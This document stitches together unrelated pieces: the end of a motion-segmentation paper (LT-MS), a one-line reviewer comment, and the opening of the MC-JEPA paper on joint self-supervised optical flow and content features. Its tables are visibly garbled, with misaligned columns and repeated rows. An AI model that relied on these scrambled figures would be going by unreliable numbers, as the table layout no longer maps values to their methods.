70.3 | 55.0 | | EM (21) | | | 69.3 | 70.7 | 55.5 | | MoSeg (35) | | | 68.3 | 66.1 | 58.6 | | FTS (25) | | | 55.8 | - | 47.8 | | TIS$_0$ (10) | | | 56.2 | 45.6 | - | | OCLR* (33) (flow only) | | | 72.1 | - | 67.6 | | GWM (6) | | RGB (Flow in loss) | 79.5 | - | 78.3 | | RCF (16) | | | 80.9 | - | 76.7 | | AMD (17) | | | 57.8 | - | 57.0 | | MOD (8) | | | 73.9 | - | 62.2 | | DivA(4)† (14) | | RGB & Flow | 72.4 | - | 64.6 | | TIS$_s$ (10) | | | 62.6 | 59.6 | - | | CIS - No Post (36) | | | 59.2 | - | 45.6 | | CIS - With Post (36) | | | 71.5 | - | 62.0 | Table 3: Multi-segment evaluation. Regarding DAVIS2017-motion, $J \& F$ is the mean of the two. Evaluation is performed on the video as a whole according to the official DAVIS2017 scheme. Reported scores are the average of the individual video scores. *See caption of Table 2. For FBMS59, the two evaluation metrics are bootstrap IoU (bIoU) (14) where each ground-truth mask is mapped to the most likely predicted segment (performed at the frame level), and linear assignment that is a bilinear mapping between the ground-truth and the predicted segments at the sequence level (similar to the official DAVIS2017 evaluation). | Dataset | DAVIS2017-motion | FBMS59 | |------------------|-------------------|--------| | Method / Scores | $J \& F$ ↑ | $J$ ↑ | $F$ ↑ | bIoU | Linear Assignment | | **Ours LT-MS-K3** | 42.2 | 39.3 | 45.0 | 58.4 | 47.2 | | ST-MS (22) | 42.0 | 38.8 | 45.2 | - | - | | MoSeg (35) | 35.8 | 38.4 | 33.2 | - | - | | OCLR* (33) | 55.1 | 54.5 | 55.7 | - | - | | DivA (14) | - | - | - | 42.0 | - | network on the DAVIS2016 training set with now three masks ($K = 3$). The resulting performance on DAVIS2017-motion is slightly better than ST-MS (22), and far better than MoSeg. There is still the same remark about OCLR status as an unsupervised method. Regarding FBMS59, we report multimask segmentation results with two different metrics. Our LT-MS method outperforms by a large margin DivA (14) that attempted this multi-segment evaluation on FBMS59. 5.4 Qualitative Visual Evaluation Fig.3 contains several visual results to demonstrate how our LT-MS method behaves on different situations. We display three result samples obtained on different videos of the benchmarks. Additional results are provided in the Appendix. We can observe that the motion segments are globally accurate. Since our method involves several masks, we can properly handle articulated motions (people2, bmx), deal with the presence of several moving objects in the scene (people2), separate Figure 3: Results obtained with our LT-MS-K4 method ($K = 4$). Three groups of results are displayed, motocross-jump from DAVIS2016, people02 from FBMS59 and bmx from SegTrackV2. For each group, the first row samples successive flow fields (HSV color code) corresponding to the processed video. The second row contains the corresponding images of the video, where the ground-truth of the moving object is overlaid in yellow (when available at that frame). The third row shows the motion segments provided by our LT-MS-K4 method with one colour per segment. For all the results, we adopt the same color set for the three masks corresponding to the moving objects (blue, red and orange), and we let the background image for the background mask. the rider from the bike or motorbike (bmx, motocross-jump), or accommodate motion parallax. Since our method enforces temporal consistency, it can also deal with errors in optical flow estimation or with objects that momentarily stop moving (bmx). We must keep in mind that our actual target is the optical-flow segmentation (OFS) task, even if we evaluate our method on VOS benchmarks. When VOS benchmarks deal with the segmentation of one primary object moving in the foreground, it may occur discrepancies with OFS, which negatively impacts the evaluation scores. The segmentation of additional parts, which appears wrong w.r.t. VOS ground truth, on the contrary makes sense from the OFS standpoint. 6 CONCLUSION We have designed an original transformer-based unsupervised method for segmenting multiple motions over a video in one go. Our LT-MS method leverages the ELBO framework for the loss function, and fully acknowledges the temporal dimension of the motion segmentation problem. Indeed, to the best of our knowledge, our method is the first unsupervised network-based OFS method explicitly leading to a stable and consistent OF segmentation throughout long video sequences. It introduces at training time, on one hand, B-splines spatio-temporal parametric motion models over space-time volumes, and on the other hand, a loss term expressing temporal consistency over successive masks while taking care of occlusions. Our transformer-based network can be applied at test time to input volumes of any time length. It can accommodate different choices on the number $K$ of masks with a simple finetuning step. Experimental results on several datasets demonstrate the efficiency and the accuracy of our LT-MS method by providing competitive results on several datasets. In addition, it is very fast at test time. In future work, we will investigate the slot attention mechanism to modify the number of masks at test time without retraining the model. REFERENCES [1] G.K. Batchelor. *An introduction to fluid dynamics*. Cambridge University Press, 1967. [2] D.J. Butler, J. Wulff, G.B. Stanley, and M.J. Black. A naturalistic open source movie for optical flow evaluation, In *European Conference on Computer Vision (ECCV)*, 2012. [3] M. Caron, H. Touvron, I. Misra, H. Jégou, J. Mairal, P. Bojanowski, and A. Joulin. Emerging properties in self-supervised vision transformers. In *International Conference on Computer Vision (ICCV)*, October 2021. [4] B. Cheng, A. G. Schwing, and A. Kirillov. Per-pixel classification is not all you need for semantic segmentation. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021. [5] J. Cheng, Y.-H. Tsai, S. Wang, and M.-H. Yang. Segflow: Joint learning for video object segmentation and optical flow. In *International Conference on Computer Vision (ICCV)*, Venice, 2017. [6] S. Choudhury, L. Karazija, I. Laina, A. Vedaldi, and C. Rupprecht. Guess what moves: Unsupervised video and image segmentation by anticipating motion. *British Machine Vision Conference (BMVC)*, London, 2022. [7] A. Dave, P. Tokmakov, and D. Ramanan. Towards segmenting anything that moves. In *Int. Conference on Computer Vision Workshops (ICCVW)*, Seoul, 2019. [8] S. Ding, W. Xie, Y. Chen, R. Qian, X. Zhang, H. Xiong, and Q. Tian. Motion-inductive self-supervised object discovery in videos. *arxiv.org/abs/2210.00221*, October 2022. [9] B. Duke, A. Ahmed, C. Wolf, P. Aarabi, and G. W. Taylor. SSTVOS: Sparse spatiotemporal transformers for video object segmentation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, 2021. [10] B. Griffin and J. Corso. Tukey-inspired video object segmentation. In *IEEE Winter Conference on Applications of Computer Vision (WACV)*, Waikoloa Village, January 2019. [11] K. Han, Y. Wang, H. Chen, X. Chen, J. Guo, Z. Liu, Y. Tang, A. Xiao, C. Xu, Y. Xu, Z. Yang, Y. Zhang, and D. Tao. A survey on vision transformer. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, 45(1):87-110, January 2023. [12] S.D. Jain, B. Xiong, and K. Grauman. FusionSeg: Learning to combine motion and appearance for fully automatic segmentation of generic objects in videos. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Honolulu, 2017. [13] D.P. Kingma and M. Welling. An introduction to variational autoencoders. *Foundations and Trends in Machine Learning*, 12(4):307-392, 2019. [14] D. Lao, Z. Hu, F. Locatello, Y. Yang, and S. Soatto. Divided attention: Unsupervised multi-object discovery with contextually separated slots. *arXiv:2304.01430*, April 2023. [15] F. Li, T. Kim, A. Humayun, D. Tsai, and J. M. Rehg. Video segmentation by tracking many figure-ground segments. In *International Conference on Computer Vision (ICCV)*, Sydney, 2013. [16] L. Lian, Z. Wu, S. X. Yu. Bootstrapping objectness from videos by relaxed common fate and visual grouping *Conference on Computer Vision and Pattern Recognition*, Vancouver, June 2023. [17] R. Liu, Z. Wu, S. X. Yu, and S. Lin. The Emergence of objectness: Learning zero-shot segmentation from videos. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021. [18] F. Locatello, D. Weissenborn, T. Unterthiner, A. Mahendran, G. Heigold, J. Uszkoreit, A. Dosovitskiy, and T. Kipf. Object-centric learning with slot attention. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2020. [19] J. Mattheus, H. Grobler, and A. M. Abu-Mahfouzl. A review of motion segmentation: Approaches and major challenges. *International Multidisciplinary Information Technology and Engineering Conference (IMITEC)*, November 2020. [20] N. Mayer, E. Ilg, P. Häusser, P. Fischer, D. Cremers, A. Dosovitskiy and T. Brox. A large dataset to train convolutional networks for disparity, optical flow, and scene flow estimation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Las Vegas, June 2016.
9XdLlbxZCC
The proposed method performs on par or slightly worse against other flow estimation methods on Sintel benchmark and Kitti, which can not demonstrate the benefit of the proposed ''Joint-Embedding Predictive Architecture''. The authors don't give convincing analysis for this issue.
MC-JEPA: A JOINT-EMBEDDING PREDICTIVE ARCHITECTURE FOR SELF-SUPERVISED LEARNING OF MOTION AND CONTENT FEATURES Anonymous authors Paper under double-blind review ABSTRACT Self-supervised learning of visual representations has been focusing on learning content features, which do not capture object motion or location, and focus on identifying and differentiating objects in images and videos. On the other hand, optical flow estimation is a task that does not involve understanding the content of the images on which it is estimated. We unify the two approaches and introduce MC-JEPA, a joint-embedding predictive architecture and self-supervised learning approach to jointly learn optical flow and content features within a shared encoder, demonstrating that the two associated objectives; the optical flow estimation objective and the self-supervised learning objective; benefit from each other and thus learn content features that incorporate motion information. The proposed approach achieves performance on-par with existing unsupervised optical flow benchmarks, as well as with common self-supervised learning approaches on downstream tasks such as semantic segmentation of images and videos. 1 INTRODUCTION Self-supervised learning in vision has been dominated lately by approaches that aim at learning content features; i.e. features containing information that allows to identify and differentiate objects; in images (Chen et al., 2020a; Grill et al., 2020; Chen & He, 2020; Zbontar et al., 2021; Bardes et al., 2022a; Caron et al., 2020; 2021; Zhou et al., 2022; Assran et al., 2022; 2023), or videos (Qian et al., 2021; Recasens et al., 2021; Feichtenhofer et al., 2021; Tong et al., 2022). Most methods focus on learning global features that achieve strong results in tasks such as object classification or action recognition in videos. A more recent trend aims at learning localized features, that perform well on local tasks such as detection and segmentation (Xiao et al., 2021; Wang et al., 2021; Hénaff et al., 2021; 2022; Bardes et al., 2022b). However, these methods focus on understanding the content of images and videos and are not able to learn information at the pixel level, such as motion in videos or details in textures. In this paper, we focus on jointly learning motion features by using self-supervised optical flow estimation (Horn & Schunck., 1981) from videos as a pretext task, and content features with general self-supervised learning. The Optical flow captures the motion, or dense-pixel correspondence, that occurs between two images, for instance consecutive frames in a video, or images from a stereo pair. Estimating it is a fundamental problem in computer vision, whose solution is key to tasks such as visual odometry, depth estimation, or object tracking. Classical approaches cast optical flow estimation as an optimization problem (Horn & Schunck., 1981; Brox et al., 2004), where the objective is to match pixels with a smoothness constraint. Approaches based on neural networks and supervised learning (Yu et al., 2016; Ilg et al., 2017; Hui et al., 2018; Sun et al., 2018; Yang & Ramanan, 2019; Zhao et al., 2020; Teed & Deng, 2020; Jiang et al., 2021; Bai et al., 2022), are limited by the difficulty of labelling data in the real world, compared to using synthetic data. Self-supervised methods allow learning from large collections of real-world video data (Ren et al., 2017; Liu et al., 2019b;a; Zhong et al., 2019; Im et al., 2020; Liu et al., 2020; Luo et al., 2021; Jonschkowski et al., 2020; Stone et al., 2021) and offer an alternative that is now competitive with supervised approaches. However, most current methods only focus on motion without relying on the (semantic) content of the video, a problem that we solve by learning motion and content features in images at the same time with a multi-task approach. Figure 1: Multi-task self-supervised learning of content and motion features. MC-JEPA combines a self-supervised features learning and optical flow estimation approach in a multi-task setup where with a single shared encoder. The self-supervised learning of content features objective is trained on ImageNet and the self-supervised flow estimation task is trained on various videos datasets. Our final encoder produces features that have motion and content information, and that can be used to estimate optical flow in videos or for content understanding downstream tasks. Recent techniques learn spatial correspondences between video frames (Jabri et al., 2020; Bian et al., 2022; Xu & Wang, 2021; Tokmakov et al., 2022). The goal is to track the location of objects and therefore capture content information that optical flow estimation does not. These approaches can be seen as object-level motion estimation. They learn features that are very specific to the tracking task, with very poor generalization to other visual downstream tasks. Very often, they are trained on small video datasets that are not as diverse as large image datasets such as ImageNet (Deng et al., 2009), which reinforces the poor quality of the visual features learned. A more reliable way to build visual representations is to learn multiple tasks at the same time (Zhang et al., 2021; Girdhar et al., 2022). We thus propose MC-JEPA (Motion-Content Joint-Embedding Predictive Architecture), a method that learns optical flow estimation and content features, in a multi-task setting with a shared encoder, with a joint-embedding-predictive architecture (LeCun, 2022). Our contributions can be summarized as follows: • We propose a method for learning self-supervised optical flow from synthetic and real video data, based on PWC-Net (Sun et al., 2018), and improved with several additional components such as a backward consistency loss and a variance-covariance regularization term. We call this first method M-JEPA. • We combine M-JEPA in a multi-task setup with VICReg (Bardes et al., 2022a), a self-supervised learning method trained on ImageNet, in order to improve our estimated flow, and produce content features that transfer well on many downstream tasks. Our final method is called MC-JEPA. • We evaluated MC-JEPA on a range of optical flow benchmarks such as KITTI 2015 (Menze & Geiger, 2015) and Sintel (Butler et al., 2012), image and video segmentation tasks on Cityscapes (Cordts et al., 2016) or DAVIS (Pont-Tuset et al., 2017), and demonstrate strong performance on all these tasks with a single encoder. We hope that MC-JEPA will be a first step towards self-supervised learning approaches that are based on multi-task learning and joint-embedding architectures, and that can be trained on any visual data, images or video, and that generalizes well on a wide range of tasks, from motion prediction tasks to content understanding tasks. 2 RELATED WORK Self-supervised learning. The recent advances in self-supervised learning have been mainly driven by the general approach of learning invariances to hand-crafted data augmentations, using a joint- Figure 2: **MC-JEPA architecture.** Our method learns motion through optical flow estimation on videos and content through joint-embedding of views of images, in a multi-task way with a shared encoder. Our optical flow estimation architecture is based on PWC-Net (Sun et al., 2018) and works as follows. Given a pair of consecutive frames $I_t$, $I_{t+1}$ in a video, an encoder produces a set of pyramidal features $\{X^{(l)}_t\}$ and $\{X^{(l)}_{t+1}\}$. The flow is estimated in a coarse-to-fine manner, starting at the lowest resolution features $X^{(1)}$. A first flow $f^{(2)}_{t,t+1}$ is estimated by the flow estimator network, then used to warp the features $X^{(2)}_t$, which is compared to $X^{(2)}_{t+1}$ with a regression loss. The flow is then iteratively refined at every layer by predicting the residual flow and adding it to the previous layer flow. The final flow is used to warp $I_t$ and compare the warped image with $I_{t+1}$ using a reconstruction loss. Forward-backward flow consistency is encouraged with the cycle consistency losses, which minimizes the distance between $X^{(l)}_t$ and $f^{(l)}_{t,t+1}(f^{(l)}_{t+1,t}(X^{(l)}_t))$ at every layer. When the encoder is trained in the multi-task setup with a standard self-supervised learning criterion, the training is very unstable, which is prevented by the variance-covariance regularization term on every feature layer. Among self-supervised learning methods learning from images, contrastive methods push together concepts that are visually close and push away concepts that are different in the embedding space (Hjelm et al., 2019; Chen et al., 2020a; He et al., 2020; Chen et al., 2020b; Mitrovic et al., 2021; Dwibedi et al., 2021; Chen et al., 2021; Tomasev et al., 2022; Li et al., 2022), clustering methods categorized embeddings into a balanced set of clusters (Caron et al., 2018; 2020; 2021), non-contrastive methods either prevent collapsing solutions with architectural tricks (Grill et al., 2020; Lee et al., 2021; Chen & He, 2020), or with covariance-based regularization (Ermolov et al., 2021; Zbontar et al., 2021; Bardes et al., 2022a; Garrido et al., 2023b), which is equivalent under some assumptions to contrastive methods (Garrido et al., 2023a). Finally, some methods are based on masking and patch-reconstruction (Bao et al., 2022; He et al., 2022; Zhou et al., 2022; Assran et al., 2022; 2023). These methods focus on learning a global representation of the input, which is best suited for classification tasks. Dense self-supervised learning rather focuses on learning local features (Xie et al., 2021; Wang et al., 2021; Xiao et al., 2021; Yang et al., 2021; Wang et al., 2022; Yang et al., 2022; Hénaff et al., 2021; 2022; Chen et al., 2022; Caron et al., 2023), which is best suited for detection and segmentation downstream tasks. The loss functions and methods developed with images have led to the application of similar approaches to videos (Qian et al., 2021; Recasens et al., 2021; Feichtenhofer et al., 2021; Tong et al., 2022; Parthasarathy et al., 2022), with the objective of learning a representation that transfers well on action recognition benchmarks. **Optical flow estimation.** Classical techniques for optical flow estimation are based on the optimization of a matching term and a smoothness term for a given pair of images, without any kind of learning (Horn & Schunck., 1981; Brox et al., 2004; Sun et al., 2010). Later, methods based on supervised learning and convolutional neural networks came, first without any prior knowledge in architecture (Yu et al., 2016; Ilg et al., 2017), then specifically designed to tackle flow estimation (Ranjan & Black, 2017; Sun et al., 2018; Yang & Ramanan, 2019; Teed & Deng, 2020). Supervised flow estimation is limited to learning with synthetic data, and unsupervised flow estimation is a promising direction towards learning on any video data. Photometric consistency was introduced by (Ren et al., 2017) and is at the basis of every unsupervised optical flow estimation method. Additional self-supervision signals can be found with distillation of reliable matches (Liu et al., 2019b,a), global geometric constraint (Zhong et al., 2019), or data augmentation consistency (Liu et al., 2020; Stone et al., 2021). Fusing multi-layer similarities (Im et al., 2020) and carefully designing the interpolation for upsampling (Luo et al., 2021) further improve the estimated flow quality. Finally, a comprehensive set of additional tricks that help unsupervised optical flow is presented in (Jonschkowski et al., 2020). **Learning correspondences.** Learning from videos has been focusing on learning a global representation for a video, but another interesting task is learning spatial correspondences between consecutive frames. A promising direction for learning these correspondences is contrastive random walks (Jabri et al., 2020), which can also be done at the pixel level (Bian et al., 2022). Correspondences can also be learned at the object level (Xu & Wang, 2021; Patrick et al., 2021), or combined with a memory (Tokmakov et al., 2022), in order to deal with occluded objects. Learning optical flow can be seen as learning correspondences at the pixel-level, which is not captured by popular self-supervised learning methods. **Multi-task Learning.** Multi-task learning is commonly used to train an encoder on multiple tasks, when the different tasks benefit from each other. Several works use it to learn a shared representation between images and videos (Zhang et al., 2021; Girdhar et al., 2022). However, very few works use multi-task learning for self-supervised learning, the idea was introduced in (Doersch & Zisserman, 2017) and used for anomaly detection tasks in (Georgescu et al., 2021), without many follow-up work. We simply use multi-task learning for learning self-supervised content features and optical flow at the same time with a single shared encoder. ### 3 PROPOSED APPROACH In this section we describe our architecture and improvements for self-supervised optical flow estimation with a hierarchical coarse-to-fine approach, the loss functions of our method, our self-supervised general objective and multi-task setup, our data sampling strategy, and a set of tricks for stabilizing training. Section 3.1 introduces our M-JEPA method for optical flow estimation, and Section 3.2 presents how we combine M-JEPA with multi-task learning into our final MC-JEPA method. #### 3.1 OPTICAL FLOW Given a pair of RGB images, $I_t, I_{t+1} \in \mathbb{R}^{3,H,W}$, the corresponding optical flow is defined by the correspondence map $f \in \mathbb{R}^{2,H,W}$, that for a given position in $I_t$, denotes the position of the corresponding pixel in $I_{t+1}$. The goal is to learn a flow estimator function $F_\theta$ with parameters $\theta$, which outputs the flow for a pair of images $f = F_\theta(I_t, I_{t+1})$, by training it on a set of image sequences $D = \{\{I_t\}_{t=1}^T\}_{i=1}^N$. Unsupervised flow estimation usually works with a regression loss, or photometric consistency loss, which ensures that the image $I_t$ warped by the predicted flow $f$ is consistent with $I_{t+1}$, and a regularizer that encourages $f$ to be smooth. Most methods differ in the way these terms are implemented, in the details of the encoder and flow estimator architecture, and in additional self-supervisory signals. **Regression and smoothness.** We use the coarse-to-fine hierarchical flow estimator PWC-Net (Sun et al., 2018), which we adapt to work with our custom encoder architecture described in Appendix C. Given a set of features $X^{(l)}_t, X^{(l)}_{t+1} \in \mathbb{R}^{d(l) \times h(l) \times w(l)}$, corresponding to level $l$ of pyramids for images $I_t$ and $I_{t+1}$ with $l \in \{1, ..., L\}$, we first estimate a flow $f^{(2)}_{t,t+1} = F_\theta(X^{(1)}_t, X^{(1)}_{t+1}, 0)$, then recursively refine this flow at higher and higher resolutions by predicting the residual flow at every layer: $$f^{(l+1)}_{t,t+1} = F_\theta(X^{(l)}_t, X^{(l)}_{t+1}, f^{(l)}_{t,t+1}).$$ Our estimator $F_\theta(X_t, X_{t+1}, f)$ works as follows. First the feature $X_t$ is warped as $\hat{X}_{t+1} = f(X_t)$, then a 4D correlation volume $V = \hat{X}_{t+1}X^T_{t+1}$ is calculated and is fed to a small convolutional network $g_\phi(V, X_t, \hat{X}_{t+1}, f)$ which predicts the residual flow. We then use a multi-scale loss on the intermediate feature layers of the encoder, defined as follows: $$L_{reg} = \sum_{l=1}^L \|X^{(l)}_{t+1} - \hat{X}^{(l)}_{t+1}\|_2^2.$$ Table 1: **Quantitative results.** Comparison of the performance of our model on: (1) Sintel (Butler et al., 2012) clean and final, and KITTI 2015 (Menze & Geiger, 2015) optical flow estimation benchmarks; (2) Pascal VOC (Everingham et al., 2010), Cityscapes (Cordts et al., 2016) and ADE20k (Zhou et al., 2019), both frozen and fine-tune linear segmentation benchmarks; (3) DAVIS-2017 (Pont-Tuset et al., 2017) and video object segmentation benchmark, against several self-supervised methods optimized for a single task specifically. EPE is the average end-point-error (↓ Lower is better). F1 is the average-f1 error in (%) (↑ Lower is better). mIoU is the mean intersection-over-union (↑ Higher is better). \((J\&F)_m\) is the average between mean region similarity and mean contour-based accuracy (↑ Higher is better). MC-JEPA is our full model trained in multi-task way on ImageNet and flow estimation. M-JEPA is our model without content learning, trained only on flow estimation. The best and second best result for each benchmark are **bold** and underlined. | Method | Backbone | Optical Flow Estimation | Image Segmentation | Video Seg | |-----------------|----------|-------------------------|--------------------|-----------| | | | Sintel Clean | Sintel Final | KITTI 2015 | Pascal VOC | CityScapes | ADE20k | Davis 2017 | | | | train test EPE | test EPE | train test EPE | EPE | F1 | Frozen FT | mIoU | Frozen FT | mIoU | Frozen FT | mIoU | \((J\&F)_m\) | | Rand. weights | CNX-T | 23.71 - | 24.02 - | 24.88 - | 0.5 - | - - | - - | - - | - - | - - | - - | - - | | flow methods | | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | | UFlow (Jonschkowski et al., 2020) | PWC | 2.50 5.21 | 3.39 6.50 | 2.71 11.13 | 7.8 - | - - | - - | - - | - - | - - | - - | - - | | ARFlow (Liu et al., 2020) | PWC | 2.79 4.78 | 3.73 5.89 | 2.85 11.80 | 7.9 - | - - | - - | - - | - - | - - | - - | - - | | UPFlow (Luo et al., 2021) | PWC | 2.33 4.68 | 2.67 5.32 | 2.45 9.38 | 8.8 - | - - | - - | - - | - - | - - | - - | - - | | SMFlow (Liu et al., 2021) | RAFT | 1.71 3.15 | 2.55 4.18 | 2.00 8.85 | 10.4 - | - - | - - | - - | - - | - - | - - | - - | | correspondence methods | | R50 | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | PWC | | VFS (Xu & Wang, 2021) | R50 | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | | MCRW (Bian et al., 2022) | PWC | 2.84 5.68 | 3.82 6.72 | 2.81 11.67 | 39.8 - | - - | - - | - - | - - | - - | - - | - - | | content methods | | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | | VICReg (Bardes et al., 2022a) | CNX-T | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | | VICRegL (Bardes et al., 2022b) | CNX-T | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | | MoCo v3 (Chen et al., 2021) | ViT-S | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | | DIINO (Caron et al., 2021) | ViT-S | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | - - | | ours | M-JEPA | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | | | | 2.98 - | 3.82 - | 3.01 - | 9.4 - | - - | - - | - - | - - | - - | - - | - - | - - | | | MC-JEPA | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | CNX-T | | | | 2.81 5.01 | 3.51 6.12 | 2.67 11.33 | 67.1 79.9 | 65.5 78.4 | 30.8 44.2 | 70.5 | and a reconstruction loss on the last layer that is at the image level: \[ L_{rec} = d(I_{t+1}, \hat{I}_{t+1}), \] where \(d\) is a loss function that is a linear combination of an \(l_2\), \(l_1\), and SSIM losses. In addition, we use the smoothness regularizer of (Jonschkowski et al., 2020) that constrains the produced flow to be smooth, and allows us to deal with repetitive or textureless patterns: \[ L_{smooth} = \sum_{d \in \{x,y\}} \sum_p \exp(-\lambda \nabla_d I) \| \nabla_d f_{t,t+1} \|_1, \] where \(x\) and \(y\) are directions in which the predicted flow is constrained to remain stable if the image gradient does not significantly change. **Cycle consistency.** Flow estimation is a non-symmetric operation, as not all pixels of \(I_t\) have a correspondence in \(I_{t+1}\) and vice versa. For a given pair of images, we estimate both the forward and backward flows. We introduce a cycle-consistency loss that constraint the features \(X_t\) warped by \(f_{t,t+1}\) then by \(f_{t+1,t}\) to match with \(X_t\), the loss is defined as follows: \[ L_{cycle} = \sum_{l=1}^L \| X_t^{(l)} - f_{t+1,t}(f_{t,t+1}(X_t^{(l)})) \|_2^2, \] where \(f(X)\) is the warping operation of \(X\) by flow \(f\). We symmetrize the loss and do the same for \(X_{t+1}\). In order to deal with occlusion, we follow (Liu et al., 2019a) and use forward-backward compatibility, only applying \(L_{reg}\) on the pixels that have a correspondence in both the forward and the backward flows. **Variance-covariance regularization.** Finally, in order to regularize the features produced by our encoder, we introduce a variance-covariance regularization loss function (Bardes et al., 2022a), de- Figure 3: **Qualitative visualization: optical flow.** We compare our results of our complete model (MC-JEPA) and our model only pretrained on flow (M-JEPA) with ARFlow. Top 2 rows are from KITTI-15, bottom 2 rows are from Sintel clean and Sintel final. defined as follows: \[ L_{vc} = \sum_{l=1}^{L} \frac{1}{d} \sum_{j=1}^{d} \max(0, \gamma - \sqrt{\text{Var}(X_{t,j}^{(l)}) + \epsilon}) \\ + \frac{1}{d} \sum_{i \neq j} [C(X_{t}^{(l)})]_{i,j}^2. \] where Var is the empirical variance and \( C \) is the empirical covariance matrix after centering the features. This loss helps stabilizing the training with the multi-task setup described in Section 3.2, and also improves the performance of the method as shown by Table 11. ### 3.2 Multi-task self-supervised learning This section describes how we combine M-JEPA with content learning into our final MC-JEPA method. **Learning content features.** We follow the literature (Chen et al., 2020a; Grill et al., 2020; Caron et al., 2020; Bardes et al., 2022a) and learn content features by simply pre-training our encoder to jointly-embed two views of an image. We generate the views using image transformation such as random cropping and color jittering. In particular, we use the VICReg objective (Bardes et al., 2022a) and follow its protocol. From a seed image sampled in an unlabelled training dataset \( D \), two views are generated using common data augmentation such as random cropping and color jittering, the views are then rescaled to a fixed size and fed to an encoder, then mapped to an expander network on which the VICReg loss is applied. The VICReg loss \( L_{ssl} \) is similar to Eq. (6), with in addition an invariance term (\( l_2 \) loss) that makes the embedding of the two views closer to each other and is minimized over \( D \). **Multi-task learning.** At a given iteration of training, we sample a batch of sequences from our video dataset and compute the flow loss, then sample a batch of images from ImageNet and compute our self-supervised learning loss, and then add the two losses and back-propagate the gradients into our encoder, expander, and flow estimator network. The encoder architecture and weights are shared between the two tasks. We illustrate our approach in Figure 1 for the general idea and Figure 2 for the detailed architecture. The final loss function that MC-JEPA optimizes is as defined follows: \[ \sum_{D_1} L_{rec} + L_{reg} + L_{smooth} + L_{cycle} + L_{vc} + \sum_{D_2} L_{ssl}, \] where \( D_1 \) is our video sequences dataset and \( D_2 \) is our image dataset. The losses are balanced with additional coefficients that we tune carefully. Additional details are given in Appendix B, including the values we use for these coefficients. Figure 4: **Qualitative visualization: video segmentation.** We visualize the segmentation maps obtained by the frozen features learnt with MC-JEPA on the video instance tracking task on DAVIS 2017, for several video sequences, at frames t=1,10,25,50. Frame 1 is given as ground truth, and the others are predicted by our model. ### 4 EXPERIMENTS #### 4.1 DATASETS Our model is pretrained in a single phase on a set of datasets commonly used for optical flow estimation, as well as on ImageNet-1k (Deng et al., 2009). Our video and flow datasets are KITTI (raw (A. et al., 2013), 2012 multiview (Geiger et al., 2012) and 2015 multiview (Menze & Geiger, 2015)), MPI Sintel (Butler et al., 2012) (clean, final and raw movie), FlyingChairs (Yu et al., 2016), FlyingThings (N. et al., 2016), and HD1K (D. et al., 2016). We evaluate the quality of our estimated flow on Sintel clean and final and KITTI 2015 and compare our model with state-of-the-art methods in self-supervised flow estimation. We evaluate the quality of our features on instance segmentation on Pascal VOC (Everingham et al., 2010), CityScapes (Cordts et al., 2016) and ADE20k (Zhou et al., 2019), both in linear frozen and fine-tuning evaluation. Finally, we evaluate our model on the DAVIS 2017 (Pont-Tuset et al., 2017) video segmentation and instance tracking benchmark popularized by (Caron et al., 2021). #### 4.2 MAIN RESULTS **Optical flow.** We compare the flow estimated by our model with several state-of-the-art methods optimized for flow estimation, as well as with MCRW, which discovers the flow by learning contrastive random walks between pixels. Table 1 presents our results, which are on par with UFLow (Jonschkowski et al., 2020), ARFlow (Liu et al., 2020) and UPFLow (Luo et al., 2021), which are all optimized for flow estimation. SMURF (Stone et al., 2021) is better on all the benchmarks, but our goal is not to learn the best flow possible but rather to use it as a pretext task to learning general features and motion. However, we outperform MCRW which shares the same goal. Figure 3 presents our optical flow qualitative results. **Instance Segmentation.** Table 1 presents the performance of MC-JEPA in various frozen and fine-tuned linear segmentation tasks, which are commonly used to evaluate the quality of the features learned by self-supervised learning models (Zhou et al., 2022; Bardes et al., 2022b). We outperform MoCo v3 (Chen et al., 2021) and VICReg (Bardes et al., 2022a), which is the method we use for our content features learning, by a large margin, which indicates that our flow estimation pretext task significantly helps the localization. Our results are on-par with VICRegL (Bardes et al., 2022b) which is specialized for segmentation and DINO (Caron et al., 2021) which has among the best self-supervised features available. **Video Segmentation.** Finally, we compare the performance of MC-JEPA on a video segmentation instance tracking task on the DAVIS 2017 dataset, against VFS (Xu & Wang, 2021) and MCRW (Bian et al., 2022) which are correspondence learning methods and DINO. We outperform all these methods, which shows that learning motion through flow estimation is a good way of improving the learning of content features for tasks that requires motion information. Figure 4 shows qualitative results on DAVIS 2017. Overall, our method allows us to train a single model that performs very well on all the above-mentioned tasks, whereas all the concurrent works are specialized for either content feature learning or motion and optical flow estimation learning. Table 2: **Ablation: flow datasets.** Impact on performance when varying the set of pretraining datasets. KITTI means pretraining on KITTI raw, 2012 and 2015. Sintel means pretraining Sintel raw, clean and final. FT/FC are FlyingThings and FlyingChairs. The metric for K15 (KITTI 2015), clean and final is the EPE. ISeg is the linear frozen evaluation on Pascal VOC, in mIoU, VSeg is the evaluation on DAVIS 2017, in \((J\&F)_m\). | KITTI | Sintel | FT/FC | HD1k | K15 clean | final | ISeg | VSeg | |-------|--------|------|-----|-----------|-------|------|------| | ✓ | | | | 2.93 | 3.23 | 3.96 | 66.8 | 70.0 | | ✓ | ✓ | | | 3.78 | 2.95 | 3.61 | 66.4 | 69.9 | | ✓ | ✓ | ✓ | | 2.91 | 2.99 | 3.70 | 67.2 | 70.4 | | ✓ | ✓ | ✓ | ✓ | 2.88 | 2.93 | 3.66 | 67.1 | 70.3 